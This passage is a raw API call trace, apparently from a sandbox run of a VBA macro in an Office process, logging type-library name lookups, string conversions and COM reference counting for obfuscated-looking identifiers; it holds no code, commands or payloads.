0x1099c5 [0068.820] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="FBwXA4B" | out: _Dst="FBwXA4B") returned 0x0 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="FBwXA4B") returned 8 [0068.820] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.820] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FBwXA4B", lHashVal=0x1099c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.820] IUnknown:Release (This=0x665ba50) returned 0xd [0068.820] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.820] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FBwXA4B", lHashVal=0x1099c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.820] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.821] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.821] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FBwXA4B", lHashVal=0x1099c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.821] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.821] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.821] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FBwXA4B", lHashVal=0x1099c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.821] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBwXA4B") returned 8 [0068.821] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FBwXA4B", lHashVal=0x1099c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.821] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.821] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60f32 | out: _Dst=0x67c2d40) returned 0x0 [0068.821] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FBwXA4B") returned 0x108dc8 [0068.821] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_FBwXA4B" | out: _Dst="_B_var_FBwXA4B") returned 0x0 [0068.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_FBwXA4B") returned 15 [0068.821] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.821] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FBwXA4B", lHashVal=0x108dc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.821] IUnknown:Release (This=0x665ba50) returned 0xd [0068.821] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.821] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FBwXA4B", lHashVal=0x108dc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.821] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.821] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.821] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FBwXA4B", lHashVal=0x108dc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.821] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.821] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.821] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FBwXA4B", lHashVal=0x108dc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.821] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.821] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.821] IUnknown:Release (This=0x665ba50) returned 0xd [0068.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc289a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_FBwXA4B") returned 15 [0068.821] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FBwXA4B", lHashVal=0x108dc8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0068.821] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60f32 | out: _Dst=0x144ec0) returned 0x0 [0068.822] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PAAAAUB", lHashVal=0x103b31, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAAAAUB") returned 8 [0068.822] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PAAAAUB", lHashVal=0x103b31, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAAAAUB") returned 8 [0068.822] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PAAAAUB", lHashVal=0x103b31, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.822] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAAAUB") returned 0x103b31 [0068.822] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PAAAAUB" | out: _Dst="PAAAAUB") returned 0x0 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PAAAAUB") returned 8 [0068.822] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.822] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PAAAAUB", lHashVal=0x103b31, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.822] IUnknown:Release (This=0x665ba50) returned 0xd [0068.822] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.822] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PAAAAUB", lHashVal=0x103b31, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.822] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.822] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.822] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PAAAAUB", lHashVal=0x103b31, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.822] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.822] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.822] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PAAAAUB", lHashVal=0x103b31, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.822] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAAAAUB") returned 8 [0068.822] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PAAAAUB", lHashVal=0x103b31, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.822] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.822] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60f5a | out: _Dst=0x67c2d40) returned 0x0 [0068.822] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PAAAAUB") returned 0x102f34 [0068.823] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PAAAAUB" | out: _Dst="_B_var_PAAAAUB") returned 0x0 [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PAAAAUB") returned 15 [0068.823] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.823] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PAAAAUB", lHashVal=0x102f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.823] IUnknown:Release (This=0x665ba50) returned 0xd [0068.823] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.823] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PAAAAUB", lHashVal=0x102f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.823] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.823] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.823] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PAAAAUB", lHashVal=0x102f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.823] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.823] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.823] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PAAAAUB", lHashVal=0x102f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.823] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.823] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.823] IUnknown:Release (This=0x665ba50) returned 0xd [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc28ca, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_PAAAAUB") returned 15 [0068.823] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PAAAAUB", lHashVal=0x102f34, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.823] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60f5a | out: _Dst=0x144ec0) returned 0x0 [0068.823] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tQAAQ_Q", lHashVal=0x10ece5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tQAAQ_Q") returned 8 [0068.823] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tQAAQ_Q", lHashVal=0x10ece5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tQAAQ_Q") returned 8 [0068.823] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tQAAQ_Q", lHashVal=0x10ece5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.823] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tQAAQ_Q") returned 0x10ece5 [0068.823] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="tQAAQ_Q" | out: _Dst="tQAAQ_Q") returned 0x0 [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="tQAAQ_Q") returned 8 [0068.824] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.824] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tQAAQ_Q", lHashVal=0x10ece5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.824] IUnknown:Release (This=0x665ba50) returned 0xd [0068.824] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.824] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tQAAQ_Q", lHashVal=0x10ece5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.824] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.824] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.824] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tQAAQ_Q", lHashVal=0x10ece5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.824] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.824] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.824] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tQAAQ_Q", lHashVal=0x10ece5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.824] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="tQAAQ_Q") returned 8 [0068.824] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tQAAQ_Q", lHashVal=0x10ece5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.824] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.824] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60f82 | out: _Dst=0x67c2d40) returned 0x0 [0068.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tQAAQ_Q") returned 0x10f069 [0068.824] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_tQAAQ_Q" | out: _Dst="_B_var_tQAAQ_Q") returned 0x0 [0068.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_tQAAQ_Q") returned 15 [0068.824] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.824] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tQAAQ_Q", lHashVal=0x10f069, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.824] IUnknown:Release (This=0x665ba50) returned 0xd [0068.824] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.824] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tQAAQ_Q", lHashVal=0x10f069, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.824] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.824] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.824] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tQAAQ_Q", lHashVal=0x10f069, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.824] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.824] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.824] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tQAAQ_Q", lHashVal=0x10f069, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.824] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.824] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.824] IUnknown:Release (This=0x665ba50) returned 0xd [0068.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc28fa, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_tQAAQ_Q") returned 15 [0068.825] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tQAAQ_Q", lHashVal=0x10f069, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0068.825] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60f82 | out: _Dst=0x144ec0) returned 0x0 [0068.825] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.825] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.825] IUnknown:Release (This=0x665ba50) returned 0xd [0068.825] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.825] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.825] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.825] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.825] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.825] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.825] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.825] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.825] IUnknown:Release (This=0x665ba50) returned 0xd [0068.825] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.825] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.825] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.825] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.825] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.826] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.826] IUnknown:Release (This=0x665ba50) returned 0xd [0068.826] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.826] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.826] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.826] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.826] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.826] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.826] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.826] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.826] IUnknown:Release (This=0x665ba50) returned 0xd [0068.826] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.826] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.826] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.826] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.826] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.826] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.826] IUnknown:Release (This=0x665ba50) returned 0xd [0068.826] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.826] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.826] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.826] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.826] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.826] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, 